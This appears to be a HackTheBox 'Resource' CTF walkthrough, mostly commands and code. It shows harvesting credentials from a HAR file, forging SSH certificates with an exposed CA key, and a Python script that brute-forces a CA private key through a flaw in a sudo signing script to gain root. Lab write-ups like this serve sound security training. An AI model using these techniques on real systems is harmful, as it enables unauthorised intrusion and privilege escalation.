HackTheBox Resource Writeup
Explore the fundamentals of cybersecurity in the Resource Capture The Flag (CTF) challenge, a hard-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
10.10.11.27 ssg.htb itrc.ssg.htb
Script to add hosts automatically
ip="10.10.11.27"
domain="ssg.htb itrc.ssg.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV itrc.ssg.htb
Nmap scan report for itrc.ssg.htb (10.10.11.27)
Host is up (0.052s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 78:1e:3b:85:12:64:a1:f6:df:52:41:ad:8f:52:97:c0 (ECDSA)
|_ 256 e1:1a:b5:0e:87:a4:a1:81:69:94:9d:d4:d4:a3:8a:f9 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://itrc.ssg.htb/
2222/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f2:a6:83:b9:90:6b:6c:54:32:22:ec:af:17:04:bd:16 (ECDSA)
|_ 256 0c:c3:9c:10:f5:7f:d3:e4:a8:28:6a:51:ad:1a:e1:bf (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Foothold
copy the coockie value PHPSESSID
curl http://itrc.ssg.htb/uploads/c2f4813259cc57fab36b311c5058cf031cb6eb51.zip -b 'PHPSESSID=<value>' -o c2f4813259cc57fab36b311c5058cf031cb6eb51.zip
unzip c2f4813259cc57fab36b311c5058cf031cb6eb51.zip
grep -oP 'user=[^&]+&pass=[^"]+' itrc.ssg.htb.har
rm -rf c2f4813259cc57fab36b311c5058cf031cb6eb51.zip itrc.ssg.htb.har
ssh msainristil@itrc.ssg.htb
CA Cert Autority
cd decommission_old_ca/
ssh-keygen -t rsa -b 2048 -f keypair
ssh-keygen -s ca-itrc -I user-cert -n root -V +52w -z 12345 keypair.pub
ssh -o CertificateFile=keypair-cert.pub -i keypair root@localhost
cat /home/zzinter/user.txt
exit
Now for zzinter
cd decommission_old_ca/
ssh-keygen -t rsa -C zzinter@ssg.htb -f users_key
ssh-keygen -s ca-itrc -n zzinter -I ident users_key.pub
in you local pc:
scp msainristil@itrc.ssg.htb:'/home/msainristil/decommission_old_ca/user***' .
ssh -i users_key zzinter@ssg.htb
to move from zzinter@itrc to the docker host
cp sign_key_api.sh sign.sh
chmod +x sign.sh
sed -i 's/supported_principals="webserver,analytics,support,security"/supported_principals="webserver,analytics,support,security,zzinter_temp"/' sign.sh
rm -f keypair*
ssh-keygen -f keypair
./sign.sh keypair.pub zzinter zzinter_temp | tee keypair-cert.pub
ssh -o CertificateFile=keypair-cert.pub -i keypair zzinter@172.223.0.1 -p 2222
172.223.0.1 was identified through a ping sweep and port scan.
Now for root
nano exploit.py
#!/bin/env python
import subprocess
import string
def run_signing_command(pattern):
with open('/tmp/ca-test', 'w') as f:
f.write(pattern)
result = subprocess.run(['sudo', '/opt/sign_key.sh', '/tmp/ca-test', 'root.pub', 'root', 'root_user', 'ABCD'], capture_output=True, text=True)
return result.stdout.strip(), result.stderr.strip()
def brute_force_patterns():
chars = string.ascii_letters + string.digits + '-+=/ \r\n'
base_pattern = ''
while True:
found = False
for char in chars:
pattern = base_pattern + char + '*'
stdout, _ = run_signing_command(pattern)
if "Error: Use API for signing with this CA." in stdout:
base_pattern += char
print(base_pattern)
found = True
break
if not found:
break
return base_pattern
if __name__ == '__main__':
ca_key = brute_force_patterns()
if "-----END OPENSSH PRIVATE KEY-----" in ca_key:
with open("ca-it", "w") as file:
file.write(ca_key)
print("\n\nSuccess\n")
else:
exit("\n\nFail\n")
python exploit.py
now in your local pc use the key:
nano pwn.key
chmod 600 pwn.key
yes | ssh-keygen -f root
ssh-keygen -s pwn.key -z 200 -I root -V -10w:forever -n root_user root.pub
ssh root@itrc.ssg.htb -p 2222 -i root -i root-cert.pub
cat /root/root.txt